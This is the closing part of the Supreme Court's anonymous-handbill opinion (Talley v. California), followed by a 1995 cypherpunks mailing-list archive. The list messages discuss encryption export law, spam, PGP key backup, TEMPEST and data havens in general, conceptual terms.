Efforts were made to distinguish these four ordinances from the one held void in the Griffin case. The chief grounds urged for distinction were that the four ordinances had been passed to prevent either frauds, disorder, or littering, according to the records in these cases, and another ground urged was that two of the ordinances applied only to certain city areas. This Court refused to uphold the four ordinances on those grounds pointing out that there were other ways to accomplish these legitimate aims without abridging freedom of speech and press. Frauds, street littering and disorderly conduct could be denounced and punished as offenses, the Court said. Several years later we followed the Griffin and Schneider cases in striking down a Dallas, Texas, ordinance which was applied to prohibit the dissemination of information by the distribution of handbills. We said that although a city could punish any person for conduct on the streets if he violates a valid law, "one who is rightfully on a street . . . carries with him there as elsewhere the constitutional right to express his views in an orderly fashion . . . by handbills and literature as well as by the spoken word." Jamison v. Texas, 318 U.S. 413, 416. The broad ordinance now before us, barring distribution of "any hand-bill in any place under any circumstances," n4 falls precisely under the ban of our prior cases unless this ordinance is saved by the qualification that handbills can be distributed if they have printed on them the names and addresses of the persons who prepared, distributed or sponsored them. For, as in Griffin, the ordinance here is not limited to handbills whose content is "obscene or offensive to public morals or that advocates unlawful conduct." n5 Counsel has urged that this ordinance is aimed at providing a way to identify those responsible for fraud, false advertising and libel. 
Yet the ordinance is in no manner so limited, nor have we been referred to any legislative history indicating such a purpose. Therefore we do not pass on the validity of an ordinance limited to prevent these or any other supposed evils. This ordinance simply bars all handbills under all circumstances anywhere that do not have the names and addresses printed on them in the place the ordinance requires. There can be no doubt that such an identification requirement would tend to restrict freedom to distribute information and thereby freedom of expression. "Liberty of circulating is as essential to that freedom as liberty of publishing; indeed, without the circulation, the publication would be of little value." Lovell v. Griffin, 303 U.S., at 452. Anonymous pamphlets, leaflets, brochures and even books have played an important role in the progress of mankind. Persecuted groups and sects from time to time throughout history have been able to criticize oppressive practices and laws either anonymously or not at all. The obnoxious press licensing law of England, which was also enforced on the Colonies was due in part to the knowledge that exposure of the names of printers, writers and distributors would lessen the circulation of literature critical of the government. The old seditious libel cases in England show the lengths to which government had to go to find out who was responsible for books that were obnoxious to the rulers. John Lilburne was whipped, pilloried and fined for refusing to answer questions designed to get evidence to convict him or someone else for the secret distribution of books in England. Two Puritan Ministers, John Penry and John Udal, were sentenced to death on charges that they were responsible for writing, printing or publishing books. n6 Before the Revolutionary War colonial patriots frequently had to conceal their authorship or distribution of literature that easily could have brought down on them prosecutions by English-controlled courts. 
Along about that time the Letters of Junius were written and the identity of their author is unknown to this day. n7 Even the Federalist Papers, written in favor of the adoption of our Constitution, were published under fictitious names. It is plain that anonymity has sometimes been assumed for the most constructive purposes. We have recently had occasion to hold in two cases that there are times and circumstances when States may not compel members of groups engaged in the dissemination of ideas to be publicly identified. Bates v. Little Rock, 361 U.S. 516; N. A. A. C. P. v. Alabama, 357 U.S. 449, 462. The reason for those holdings was that identification and fear of reprisal might deter perfectly peaceful discussions of public matters of importance. This broad Los Angeles ordinance is subject to the same infirmity. We hold that it, like the Griffin, Georgia, ordinance, is void on its face. The judgment of the Appellate Department of the Superior Court of the State of California is reversed and the cause is remanded to it for further proceedings not inconsistent with this opinion. It is so ordered. Footnotes n1 Schneider v. State, 308 U.S. 147, 154. Cf. Lovell v. Griffin, 303 U.S. 444, 450. n2 Petitioner also argues here that the ordinance both on its face and as construed and applied "arbitrarily denies petitioner equal protection of the laws in violation of the Due Process and Equal Protection" Clauses of the Fourteenth Amendment. This argument is based on the fact that the ordinance applies to handbills only, and does not include within its proscription books, magazines and newspapers. Our disposition of the case makes it unnecessary to consider this contention. n3 The Court's entire sentence was: "These [pamphlets and leaflets] indeed have been historic weapons in the defense of liberty, as the pamphlets of Thomas Paine and others in our own history abundantly attest." It has been noted that some of Thomas Paine's pamphlets were signed with pseudonyms. 
See Bleyer, Main Currents in the History of American Journalism (1927), 90-93. Illustrations of other anonymous and pseudonymous pamphlets and other writings used to discuss important public questions can be found in this same volume. n4 Section 28.00 of the Los Angeles Municipal Code defines "handbill" as follows: "'HAND-BILL' shall mean any hand-bill, dodger, commercial advertising circular, folder, booklet, letter, card, pamphlet, sheet, poster, sticker, banner, notice or other written, printed or painted matter calculated to attract attention of the public." n5 Lovell v. Griffin, 303 U.S., at 451. n6 Penry was executed and Udal died as a result of his confinement. 1 Hallam, The Constitutional History of England (1855), 205-206, 232. n7 In one of the letters written May 28, 1770, the author asked the following question about the tea tax imposed on this country, a question which he could hardly have asked but for his anonymity: "What is it then, but an odious, unprofitable exertion of a speculative right, and fixing a badge of slavery upon the Americans, without service to their masters?" 2 Letters of Junius (1821) 39. MR. JUSTICE HARLAN, concurring. In judging the validity of municipal action affecting rights of speech or association protected against invasion by the Fourteenth Amendment, I do not believe that we can escape, as Mr. Justice Roberts said in Schneider v. State, 308 U.S. 147, 161, "the delicate and difficult task" of weighing "the circumstances" and appraising "the substantiality of the reasons advanced in support of the regulation of the free enjoyment of" speech. More recently we have said that state action impinging on free speech and association will not be sustained unless the governmental interest asserted to support such impingement is compelling. See N. A. A. C. P. v. Alabama, 357 U.S. 449, 463, 464; Sweezy v. New Hampshire, 354 U.S. 234, 265 (concurring opinion); see also Bates v. Little Rock, 361 U.S. 516. 
Here the State says that this ordinance is aimed at the prevention of "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," in that it will aid in the detection of those responsible for spreading material of that character. But the ordinance is not so limited, and I think it will not do for the State simply to say that the circulation of all anonymous handbills must be suppressed in order to identify the distributors of those that may be of an obnoxious character. In the absence of a more substantial showing as to Los Angeles' actual experience with the distribution of obnoxious handbills, * such a generality is for me too remote to furnish a constitutionally acceptable justification for the deterrent effect on free speech which this all-embracing ordinance is likely to have. On these grounds I concur in the judgment of the Court. Footnotes: * On the oral argument the City Attorney stated: "We were able to find out that prior to 1931 an effort was made by the local Chamber of Commerce, urging the City Council to do something about these handbills and advertising matters which were false and misleading -- had no names of sponsors. They were particularly interested in the fictitious name. They said, 'Who are these people that are distributing; who are advertising; doing things of that sort?' The meager record that we were able to find indicates that a request from the Council to the City Attorney as to their legal opinion on this subject [sic]. The City Attorney wrote back and formed the conclusion that distribution of handbills, pamphlets, or other matters, without the name of the fictitious firm or officers would be legal [sic]. 
Thereafter in the early part of 1932 an ordinance was drafted, and submitted to the City Council, and approved by them, which related to the original subject -- unlawful for any person, firm or association to distribute in the city of Los Angeles any advertisement or handbill -- or any other matter which does not have the names of the sponsors of such literature." MR. JUSTICE CLARK, whom MR. JUSTICE FRANKFURTER and MR. JUSTICE WHITTAKER join, dissenting. To me, Los Angeles' ordinance cannot be read as being void on its face. Certainly a fair reading of it does not permit a conclusion that it prohibits the distribution of handbills "of any kind at any time, at any place, and in any manner," Lovell v. Griffin, 303 U.S. 444, 451 (1938), as the Court seems to conclude. In Griffin, the ordinance completely prohibited the unlicensed distribution of any handbills. As I read it, the ordinance here merely prohibits the distribution of a handbill which does not carry the identification of the name of the person who "printed, wrote, compiled . . . manufactured [or] . . . caused" the distribution of it. There could well be a compelling reason for such a requirement. The Court implies as much when it observes that Los Angeles has not "referred to any legislative history indicating" that the ordinance was adopted for the purpose of preventing "fraud, false advertising and libel." But even as to its legislative background there is pertinent material which the Court overlooks. At oral argument, the City's chief law enforcement officer stated that the ordinance was originally suggested in 1931 by the Los Angeles Chamber of Commerce in a complaint to the City Council urging it to "do something about these handbills and advertising matters which were false and misleading." Upon inquiry by the Council, he said, the matter was referred to his office, and the Council was advised that such an ordinance as the present one would be valid. 
He further stated that this ordinance, relating to the original inquiry of the Chamber of Commerce, was thereafter drafted and submitted to the Council. It was adopted in 1932. In the face of this and the presumption of validity that the ordinance enjoys, the Court nevertheless strikes it down, stating that it "falls precisely under the ban of our prior cases." This cannot follow, for in each of the three cases cited, the ordinances either "forbade any distribution of literature . . . without a license," Lovell v. Griffin, supra, or forbade, without exception, any distribution of handbills on the streets, Jamison v. Texas, 318 U.S. 413 (1943); or, as in Schneider v. State, 308 U.S. 147 (1939), which covered different ordinances in four cities, they were either outright bans or prior restraints upon the distribution of handbills. I, therefore, cannot see how the Court can conclude that the Los Angeles ordinance here "falls precisely" under any of these cases. On the contrary, to my mind, they neither control this case nor are apposite to it. In fact, in Schneider, depended upon by the Court, it was held, through Mr. Justice Roberts, that, "In every case . . . where legislative abridgment of the rights is asserted, the courts should be astute to examine the effect of the challenged legislation . . . weigh the circumstances and . . . appraise the substantiality of the reasons advanced . . . ." Id., at 161. The Court here, however, makes no appraisal of the circumstances, or the substantiality of the claims of the litigants, but strikes down the ordinance as being "void on its face." I cannot be a party to using such a device as an escape from the requirements of our cases, the latest of which was handed down only last month. Bates v. Little Rock, 361 U.S. 516. n1 Therefore, before passing upon the validity of the ordinance, I would weigh the interests of the public in its enforcement against the claimed right of Talley. 
The record is barren of any claim, much less proof, that he will suffer any injury whatever by identifying the handbill with his name. Unlike N. A. A. C. P. v. Alabama, 357 U.S. 449 (1958), which is relied upon, there is neither allegation nor proof that Talley or any group sponsoring him would suffer "economic reprisal, loss of employment, threat of physical coercion [or] other manifestations of public hostility." Id., at 462. Talley makes no showing whatever to support his contention that a restraint upon his freedom of speech will result from the enforcement of the ordinance. The existence of such a restraint is necessary before we can strike the ordinance down. But even if the State had this burden, which it does not, the substantiality of Los Angeles' interest in the enforcement of the ordinance sustains its validity. Its chief law enforcement officer says that the enforcement of the ordinance prevents "fraud, deceit, false advertising, negligent use of words, obscenity, and libel," and, as we have said, that such was its purpose. In the absence of any showing to the contrary by Talley, this appears to me entirely sufficient. I stand second to none in supporting Talley's right of free speech -- but not his freedom of anonymity. The Constitution says nothing about freedom of anonymous speech. In fact, this Court has approved laws requiring no less than Los Angeles' ordinance. I submit that they control this case and require its approval under the attack made here. First, Lewis Publishing Co. v. Morgan, 229 U.S. 288 (1913), upheld an Act of Congress requiring any newspaper using the second-class mails to publish the names of its editor, publisher, owner, and stockholders. 39 U. S. C. @ 233. Second, in the Federal Regulation of Lobbying Act, 2 U. S. C. @ 267, Congress requires those engaged in lobbying to divulge their identities and give "a modicum of information" to Congress. United States v. Harriss, 347 U.S. 612, 625 (1954). 
Third, the several States have corrupt practices acts outlawing, inter alia, the distribution of anonymous publications with reference to political candidates. n2 While these statutes are leveled at political campaign and election practices, the underlying ground sustaining their validity applies with equal force here. No civil right has a greater claim to constitutional protection or calls for more rigorous safeguarding than voting rights. In this area the danger of coercion and reprisals -- economic and otherwise -- is a matter of common knowledge. Yet these statutes, disallowing anonymity in promoting one's views in election campaigns, have expressed the overwhelming public policy of the Nation. Nevertheless the Court is silent about this impressive authority relevant to the disposition of this case. All three of the types of statutes mentioned are designed to prevent the same abuses -- libel, slander, false accusations, etc. The fact that some of these statutes are aimed at elections, lobbying, and the mails makes their restraint no more palatable, nor the abuses they prevent less deleterious to the public interest, than the present ordinance. All that Los Angeles requires is that one who exercises his right of free speech through writing or distributing handbills identify himself just as does one who speaks from the platform. The ordinance makes for the responsibility in writing that is present in public utterance. When and if the application of such an ordinance in a given case encroaches on First Amendment freedoms, then will be soon enough to strike that application down. But no such restraint has been shown here. After all, the public has some rights against which the enforcement of freedom of speech would be "harsh and arbitrary in itself." Kovacs v. Cooper, 336 U.S. 77, 88 (1949). We have upheld complete proscription of uninvited door-to-door canvassing as an invasion of privacy. Breard v. Alexandria, 341 U.S. 622 (1951). 
Is this less restrictive than complete freedom of distribution -- regardless of content -- of a signed handbill? And commercial handbills may be declared verboten, Valentine v. Chrestensen, 316 U.S. 52 (1942), regardless of content or identification. Is Talley's anonymous handbill, designed to destroy the business of a commercial establishment, passed out at its very front door, and attacking its then lawful commercial practices, more comportable with First Amendment freedoms? I think not. Before we may expect international responsibility among nations, might not it be well to require individual responsibility at home? Los Angeles' ordinance does no more. Contrary to petitioner's contention, the ordinance as applied does not arbitrarily deprive him of equal protection of the law. He complains that handbills are singled out, while other printed media -- books, magazines, and newspapers -- remain unrestrained. However, "the problem of legislative classification is a perennial one, admitting of no doctrinaire definition. Evils in the same field may be of different dimensions and proportions, requiring different remedies. . . . Or the reform may take one step at a time, addressing itself to the phase of the problem which seems most acute to the legislative mind. . . . The prohibition of the Equal Protection Clause goes no further than the invidious discrimination. [I] cannot say that that point has been reached here." Williamson v. Lee Optical Co., 348 U.S. 483, 489 (1955). I dissent. Footnotes n1 "When it is shown that state action threatens significantly to impinge upon constitutionally protected freedom it becomes the duty of this Court to determine whether the action bears a reasonable relationship to the achievement of the governmental purpose asserted as its justification." 361 U.S., at 525. n2 Thirty-six States have statutes prohibiting the anonymous distribution of materials relating to elections. E. g.: Kan. Gen. Stat., 1949, @ 25-1714; Minn. Stat. Ann. 
@ 211.08; Page's Ohio Rev. Code Ann. @ 3599.09; Purdon's Pa. Stat. Ann., Title 25, @ 3546.

_________________________________________________________________________
David Banisar (Banisar at epic.org) * 202-544-9240 (tel)
Electronic Privacy Information Center * 202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301 * ftp/gopher/wais cpsr.org
Washington, DC 20003 * HTTP://epic.digicash.com/epic

From kipp at warp.mcom.com Wed Jan 18 08:52:33 1995
From: kipp at warp.mcom.com (Kipp E.B. Hickman)
Date: Wed, 18 Jan 95 08:52:33 PST
Subject: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID: <9501180839.ZM8045@warp.mcom.com>

On Jan 18, 7:21am, Duncan wrote:
> Subject: Re: 40bit Encryption : Adequate or sadly lacking ?
>
> >> Marc, isn't it possible (legally) to deliver products with a replaceable
> >> encryption library (dll). Delivery with a 40-bit key DLL. The user has
> >> the option to install a dll with a different keysize. Somewhat like
> >> winsock....
> >
> >
> >Actually, it's probably worse than you think:
> >
> >There are govt's out there that won't let you import code that is
> >"encryption ready". You must prove that your software is tamper proof
> >before it can be imported, and tamper proofing means that you can't
> >bolt on security. Also, I believe the export laws disallow "plug in"
> >security in the US...
> >
> >The crypto legal world sucks.
>
> Could you clarify the export restriction on "plug and play" encryption ready
> products? I am about to embark on a project that I want to be distributed
> freely that would be designed around a generic encryption interface that I
> would wrap around a real encryption core such as PGP,etc. I wanted to include a
> BS encryption in the freely distributable package to prevent export woes. The
> project is in design stages now and I don't need this additional headache.

Contact a lawyer.
It's *really* complicated, and I'm not a lawyer so anything I tell you could be wrong in some important way, and then you would get really angry if the govt started chewing you to pieces. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://home.mcom.com/people/kipp/index.html From jalicqui at prairienet.org Wed Jan 18 09:21:49 1995 From: jalicqui at prairienet.org (Jeff Licquia) Date: Wed, 18 Jan 95 09:21:49 PST Subject: (none) Message-ID: <9501181721.AA13078@firefly.prairienet.org> Eric wrote: > From: jalicqui at prairienet.org (Jeff Licquia) > > I'm sure that when your hypothetical remailer comes up and I decide to spam > you with your own words (now I wouldn't do that, now would I? ;-), your > sysadmin will be comforted by knowing that it's only ones and zeros filling > his hard disk. > >Why sendmail doesn't have anti-spam protection at this point is beyond >me. Denial of email service to one user should not deny service to >all others. I consider broken any email system that crashes a machine >because of a disk partition filling. Yes, this is true. Even if it didn't crash the system, however, it could have the effect of disabling mail service, either to all users on the system or to the particular user being spammed (depending on the robustness of the system). Though it's not as likely to anger the sysadmin, it is more likely to anger the spamee. More to the point, if the spammer uses random anonymous remailers to protect his/her identity, there's no good way to prevent this attack short of installing a filter of some kind or refusing mail from remailers. If no one will accept mail from the anon remailers, what good are they? >When your email provider gave you an account, was there an agreement >as to how much mail you could receive? If there wasn't, that provider >has no good reason to complain if you receive as much email as >possible. 
Merely because someone else decided to send it to you does not
>relieve a provider who has agreed to deliver all mail of that
>obligation.

I thought most usage agreements had something in them about reasonable limits and such. On that basis, a provider could choose to auto-kill spam if they thought it "unreasonable". This of course assumes that providers always abide by well-defined rules and are not arbitrary in any way. :-)

(As to my personal situation, since you asked: Prairienet has quotas.)

> In the real world, however, there will
> always be problems with "acceptable use" and "abuse", along with the
> additional problems with establishing policy and so on.
>
>"Acceptable use" is shorthand for "It's a little rickety, please don't
>play hard." That is, the technical means to limit the consequences of
>abuse were not developed, because everyone was willing to play nice.
>This doesn't scale, and it will have to be fixed before everyone will
>put their home computer directly on the net.

It's been my experience up to this point that for each security safeguard put in place, there will be someone somewhere that will find a way to breach it. Perhaps strong crypto will serve to end that trend; I doubt it, though, due to the horrid legal situation. Thus I doubt that written, human-enforced policy will disappear anytime soon. Not an ideal situation, I must admit.

From jalicqui at prairienet.org Wed Jan 18 09:41:44 1995
From: jalicqui at prairienet.org (Jeff Licquia)
Date: Wed, 18 Jan 95 09:41:44 PST
Subject: EE Times on PRZ
Message-ID: <9501181741.AA20208@firefly.prairienet.org>

Hal wrote:
>This, from a sidebar, is really surprising: "In contrast, public keys
>allow the overt publication of an encryption key, because decryption keys
>can only be derived through a mathematically difficult process, such as
>large prime-number factoring. Contrary to popular belief, the NSA can
>decrypt public keys of most practical key sizes." I wonder what this
>means?
If it is a claim that the NSA can factor 1024 bit moduli that >would certainly come as a big surprise. If they are saying that they can >do 512 bits that would be more believable although of interest. It is >strange that the author would include a statement like this without >attribution or evidence. Another quote from the article posted elsewhere said that, "PGP, which is based on the Diffie-Hellman public-key technology developed in the 1970s..." This is technically true, since all public-key work (including RSA) is based to some extent on DH. It could be, however, that the author is confusing public-key technology with Diffie-Hellman public-key in particular, which (as I understand it) is not particularly secure. From dcwill at ee.unr.edu Wed Jan 18 09:49:27 1995 From: dcwill at ee.unr.edu (Dr. D.C. Williams) Date: Wed, 18 Jan 95 09:49:27 PST Subject: Key backup (was: How do I know . ..) Message-ID: <199501181754.MAA24686@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- 'Eric Hughes' was reported to have written: > You use your friends now because off-site storage facilities are not > yet available. The software for distributed remote backup has yet to > make this operation transparent. Even when such a system becomes available, I don't think that it will obviate the need for relatively secure on-site storage. Banks and safe deposit boxes haven't completely precluded the demand for safes at home. Many people don't trust banks. Fewer will completely trust cypherbanks and distributed.net.storage systems. > I suspect that most private keys in the future will be held in PCMCIA > cards (initially) and then their smaller replacements. Backing up a > private key to these allows use of a safe deposit box. Safe deposit boxes, by virtue of their accessibility to law enforcement, are subject to search and seizure under court order and are sealed in certain cases (probate). 
This makes them likely to be the first place to look when the Feds decide that we can't have keys anymore. Personally speaking, I'll take my chances with secure "on-site" storage, even if I choose a location other than my own home or business.

> If it's still "passphrase-protected", an attacker would a) have to know
> what to look for
> For scalability, most people will use some standard method, whatever
> it is. This limits the search space of an opponent.

If barcoding is our example, what's to prevent it from being printed in a format selected by the user? Printing on a small paper/plastic label and affixing it (in whole or in parts) to other objects effectively disguises it as a UPC label. You would have to know which labels are a part of a keyring for them to have any significance. Even George Bush now knows that every commercial product has a UPC on it somewhere. Many stores add their own UPC sticker to merchandise for inventory control purposes. Break a keyring into 4 or 5 pieces (whatever it takes to make each piece comparable in size and appearance to the standard UPC label), stick them on selected objects, and let someone who knows what they're looking for try and reconstruct your keyring from the universe of combinations of UPC labels found around your home. With an unknown number of parts, this seems like a practically insurmountable problem. This becomes a stego problem as well as a key decryption problem.

With barcoding as the standard, another person prints his key on a small unmarked card and hides it somewhere deemed to be secure by him. The UPC-label attack fails because his keyring isn't disguised as UPC product labels. How does the attacker know what to look for?

True Paranoids could devise some sort of "invisible ink" method, requiring UV or heat exposure before the barcode becomes visible. Now your backup key looks like a blank sheet of paper.
;-)

My point is that with a regular barcode-generation program and a laser printer, an infinite number of formats and combinations can be created by individual users to suit their needs. You can print an 8.5 x 11 sheet with the title "PGP secret keyring" and put it in a frame hung on the wall, or you can print a bunch of split key pseudo-UPC labels and put one on the back of the frame to disguise it as the manufacturer's product label. One method is secure and the other is not, but the specifics are left to the user because the method is sufficiently flexible to allow a number of formats.

I contend that anyone capable of running PGP properly is also capable of using a barcode printing program without difficulty (check out the back of PC Magazine). All that would need to be written is a short routine to convert the encrypted keyring into a format suitable as input for a program of this nature. Heck, there's probably a PD barcode program out there already.

My question to the respected elders of this list is "how or why is this type of key backup system insecure, if it is in fact insecure?"

=D.C. Williams

- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From shamrock at netcom.com Wed Jan 18 10:00:06 1995
From: shamrock at netcom.com (Lucky Green)
Date: Wed, 18 Jan 95 10:00:06 PST
Subject: What is this? Anonymous message failed
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

Just got back a message from Julf's remailer that my Anonymous message failed (wrong password). Needless to say, I didn't try to send one through the remailer. The message it was referring to is the one I sent to the list earlier.
Is this a repeat of the an/na problems we had in the past?

Confused,

- --Lucky

From beattie at CSOS.ORST.EDU Wed Jan 18 10:17:09 1995
From: beattie at CSOS.ORST.EDU (Brian Beattie)
Date: Wed, 18 Jan 95 10:17:09 PST
Subject: (none)
In-Reply-To: <199501181554.HAA08177@largo.remailer.net>
Message-ID:

On Wed, 18 Jan 1995, Eric Hughes wrote:
> From: Brian Beattie
>
> I disagree, one can use e-mail to steal. E-mail consumes resources,
> resources for which the sender may have no right to use.
>
> It's not theft if there's no direct benefit to the actor. It does

I must assume that the actor who spams me or sends me unsolicited email or any email for that matter derives some benefit from this activity or they would not do it.

> consume resources, there's no argument about that. Note, however,
> that the scope of any such resource use is with the message as a bit
> sequence; no meaning or interpretation of the content is even
> relevant. That is, the resource use does not relate to the email as
> communication, merely as a technical operation.

If I make it clear that I do not wish to receive email from an individual or group and that individual or group continues to send email then I contend that they are using my resources in a way that I have not authorized.

>
> The question remains whether such resource use can ever be considered
> unauthorized. Certainly it's impolite; that's not at issue.
>
> I argue that if you hook your machine up to the Internet, you've
> implicitly authorized people to send you packets -- as many as they
> want and of whatever nature as they want.

clearly I disagree.
Brian Beattie                | [From an MIT job ad] "Applicants must also have
                             | extensive knowledge of UNIX, although they should
beattie at csos.orst.edu     | have sufficiently good programming taste to not
Fax (503)754-3406            | consider this an achievement."

From jamesd at netcom.com Wed Jan 18 10:42:27 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 18 Jan 95 10:42:27 PST
Subject: 40bit Encryption : Adequate or sadly lacking ?
In-Reply-To: <199501181321.HAA04672@pentagon.io.com>
Message-ID:

> There are govt's out there that won't let you import code that is
> "encryption ready". You must prove that your software is tamper proof
> before it can be imported, and tamper proofing means that you can't
> bolt on security. Also, I believe the export laws disallow "plug in"
> security in the US...

Central Point Software faced this problem. So they made the encryption features of their product a free add on, and posted it on bulletin boards with instructions not to download unless you were an American citizen. Needless to say these instructions were ignored, surprise surprise.

Of course this strategy only works if your product is useful without encryption, and the add on is of limited use without your product. I believe that Kevin Welch decided on this strategy.

---------------------------------------------------------------------
We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from the arbitrary power of the omnipotent state.
James A. Donald
jamesd at netcom.com
http://www.catalog.com/jamesd/

From strick at versant.com Wed Jan 18 10:47:11 1995
From: strick at versant.com (strick -- henry strickland)
Date: Wed, 18 Jan 95 10:47:11 PST
Subject: EE Times on PRZ
In-Reply-To: <9501181741.AA20208@firefly.prairienet.org>
Message-ID: <9501181850.AA25257@versant.com>

THUS SPAKE jalicqui at prairienet.org (Jeff Licquia):
# Hal wrote:
# >large prime-number factoring.
Contrary to popular belief, the NSA can
# >decrypt public keys of most practical key sizes." I wonder what this
# >means?

Just as healthy paranoia, that's worth pursuing. But I bet the author didn't know what they were talking about.

# Another quote from the article posted elsewhere said that, "PGP, which is
# based on the Diffie-Hellman public-key technology developed in the 1970s..."
# This is technically true, since all public-key work (including RSA) is based
# to some extent on DH. It could be, however, that the author is confusing

DH uses "discrete log" as the hard problem, and very straightforward mathematics.

RSA uses "factoring" as the hard problem, and a very clever back door.

How do you decide if one is based on the other?

# public-key technology with Diffie-Hellman public-key in particular, which
# (as I understand it) is not particularly secure.

It's still up in the air, isn't it, whether the discrete log or factoring is the harder to crack. My intuition is they're the same hard.

I know of no problem with DH that RSA doesn't have similar problems.

strick

From jamesd at netcom.com Wed Jan 18 11:12:04 1995
From: jamesd at netcom.com (James A. Donald)
Date: Wed, 18 Jan 95 11:12:04 PST
Subject: (none)
In-Reply-To: <9501181603.AA01635@snark.imsi.com>
Message-ID:

Eric Hughes says:
> > I argue that if you hook your machine up to the Internet, you've
> > implicitly authorized people to send you packets -- as many as they
> > want and of whatever nature as they want. No service provision I've
> > ever seen gives any recourse to the end user against the provider for
> > "bad" packets.

On Wed, 18 Jan 1995, Perry E. Metzger wrote:
> Be that as it may, people HAVE been kicked off for mischief like
> forging routing packets -- and if someone started hosing me down with
> any one of several really nasty packet based attacks I'm familiar with
> I would expect action to be taken against them.

Unix is broken. Windows and DOS are fragile and under construction.
Servers should have built in limits, that cause them to spit back packets from unknown clients that are unreasonable or strain the system. For example an SMTP server should have a default limit on volume per address and per client, with the user being able to vary such limits for particular clients or addresses -- trusted or hostile clients. At present most unix utilities have arbitrary fixed length internal buffers for processing variable length fields. If you overflow the buffer by sending pathological data you will crash the system. If you know machine code, and you overflow the buffer with carefully chosen data then instead of a random crash you can get the server to do some particular unexpected thing -- for example the internet worm caused the server to execute a file that the mail server had just received. This is one of many bugs that make attacks possible. This is a bug. It can and regularly does crash your system and cause loss of data even if nobody attacks. Every flaw in the system causes more havoc by accident than it does by malice. The correct solution is not to create institutions capable of dealing effectively with hostile acts. The big problem is bugs that urgently need fixing. Now even if all the bugs were fixed some really evil packet based attacks are still possible, in which case social action -- cutting the connectivity of a host that generates bad packets -- is still necessary, but again bad packets are more common by malfunction than by malice. > I doubt it. It really hasn't proved to be an actual problem thus > far. If anything, the limiting factor on scalability is the fact that > the net has no locality of reference, which is making routing design > harder and harder. Routing is currently THE big unsolved problem on > the net -- something outsiders to the IETF rarely suspect, because the > engineers have been faking it so well for so long. 
Unfortunately, all > the good solutions to the routing problem are mathematically > intractable -- and the practical ones are leading to bad potential > long term problems.. This is inaccurate. Optimal solutions to the routing problem are mathematically intractable. Tolerable solutions are mathematically tractable. For realistic routing problems, tractable approximations are only worse than an optimal solution by a modest factor. There are real world problems where tractable approximations are not good enough, but routing is not one of them. Of course I am sure Perry is correct when he says that the tractable approximations that we are currently using fail to scale, but this is not a fundamental unsolved problem in mathematics -- it is merely yet another bug. --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we are. True law derives from this right, not from James A. Donald the arbitrary power of the omnipotent state. jamesd at netcom.com http://www.catalog.com/jamesd/ From tcmay at netcom.com Wed Jan 18 11:17:31 1995 From: tcmay at netcom.com (Timothy C. May) Date: Wed, 18 Jan 95 11:17:31 PST Subject: TEMPEST In-Reply-To: <199501181520.AB24570@mail.eskimo.com> Message-ID: <199501181916.LAA09619@netcom12.netcom.com> Joel McNamara wrote: > The Cyphernomicon talks about a proposed, early Cypherpunk project that > dealt with TEMPEST/VanEck monitoring. Did anyone carry this out beyond the > idea stage? All I ever seem to see is "theory" and "hear-say" on this topic > (and the original VanEck article appears dated and incomplete). We all need to remember that projects are not "proposed" and then "assigned." That is, projects only get done when someone decides to personally champion that project. I'm sure this is obvious, but maybe not. The TEMPEST thread comes up now and then, but nobody (at least to my knowledge) has gotten interested enough to pursue it. 
Before anyone ever asks why _others_ are not doing work in this area, they should look to themselves. (Not meant to be a critical remark directed at Joel, just a general comment that the only things that get done are the things that get done.) > I noticed the Consumertronics (John Williams in Alamogordo, New Mexico) > catalog has an assembled device that will work with EGA to SVGA monitors. > $3,995 seems a bit pricey though (or is it). Has anyone had dealings with > Consumertronics in the past? TEMPEST has very little to do with Cypherpunks goals, actually. First, buying such a gadget, tweaking it, exploring capabilities, etc., would lead to what? The ability to park a van in front of someone's house and--maybe--monitor their screens? We already know this is possible. (You all knew that, didn't you?) I'm not saying it wouldn't be useful to have someone on our list who has a lot of experience in this area, but mainly just for the "background" it would provide. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From entropy at IntNet.net Wed Jan 18 11:26:02 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 18 Jan 95 11:26:02 PST Subject: [ DH Code ] In-Reply-To: Message-ID: > Are there implemented DH codes running around anywhere? DH code is easy - using PGP and perl you can build a simple one in a matter of hours. But: where's the market? 
The only people I've ever known to need a 'data haven' were a group of people who'd obtained the source code to a major commercial operating system and used a freenet account and ftp to transfer it. (40 mB+, I gather). I can see building one - it doesn't seem at all difficult. But I don't see how I could be reimbursed for the disk space and bandwidth. -jon ( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- ) ( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 ) ( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 ) From entropy at IntNet.net Wed Jan 18 11:33:16 1995 From: entropy at IntNet.net (Jonathan Cooper) Date: Wed, 18 Jan 95 11:33:16 PST Subject: Another problem w/Data Havens... In-Reply-To: Message-ID: > I could write a procmail recipe and a script in about an hour to > automatically secret-share-split and redistribute the incoming submission. I'll wager most of us could. Question: whom would you redistribute it _TO_? This seems to be the stumbling block - who is willing to store the data on their machine or net account? Speaking as someone with about 300k of quota left, it certainly couldn't be me, though I'd be willing to handle the frontend interfacing work. How would you handle retrieval of the data? > If the authorities attempt to indict you for possessing illegal > information / kiddie porn / whatnot, they have to prove that you > interfered with the automatic redistribution process and examined the > contents of the submission. If you in fact did not look at the submission, > they would have a difficult time doing so. Unfortunately I've found that the U.S. government especially can make your life a living hell if you don't go along with their desires, even if you're following all the laws. Trumped-up charges. Fake charges. I wouldn't put much past our government. -jon ( --------[ Jonathan D. 
